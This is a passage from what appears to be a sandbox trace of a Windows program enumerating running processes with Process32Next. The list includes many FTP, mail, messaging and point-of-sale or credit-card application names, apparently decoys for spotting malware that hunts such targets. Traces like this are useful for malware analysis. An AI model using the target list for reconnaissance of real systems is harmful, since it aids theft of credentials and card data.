lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.008] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0263.010] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.011] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0263.013] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.014] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0263.016] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0263.018] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0263.019] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0263.021] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0263.022] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0263.023] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.026] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.028] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0263.029] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.031] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0263.032] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.033] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0263.035] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0263.037] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0263.038] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0263.040] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0263.041] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0263.043] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0263.044] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0263.046] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0263.047] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0263.049] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0263.050] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0263.052] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0263.053] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0263.060] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0263.062] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0263.063] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0263.068] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0263.070] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0263.072] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0263.073] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0263.075] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0263.077] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0263.079] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0263.081] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0263.083] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0263.085] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0263.087] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0263.089] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0263.091] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0263.093] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0263.095] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0263.096] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0263.098] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0263.100] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0263.102] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0263.105] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0263.107] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0263.109] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0263.111] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0263.113] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0263.114] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0263.116] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0263.118] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0263.120] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0263.122] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0263.123] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0263.125] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0263.127] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0263.129] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0263.131] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0263.138] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0263.140] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0263.141] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0263.146] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0263.148] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0263.150] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0263.152] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0263.154] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0263.156] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0263.158] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0263.160] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0263.161] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0263.163] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0263.165] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0263.166] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0263.168] 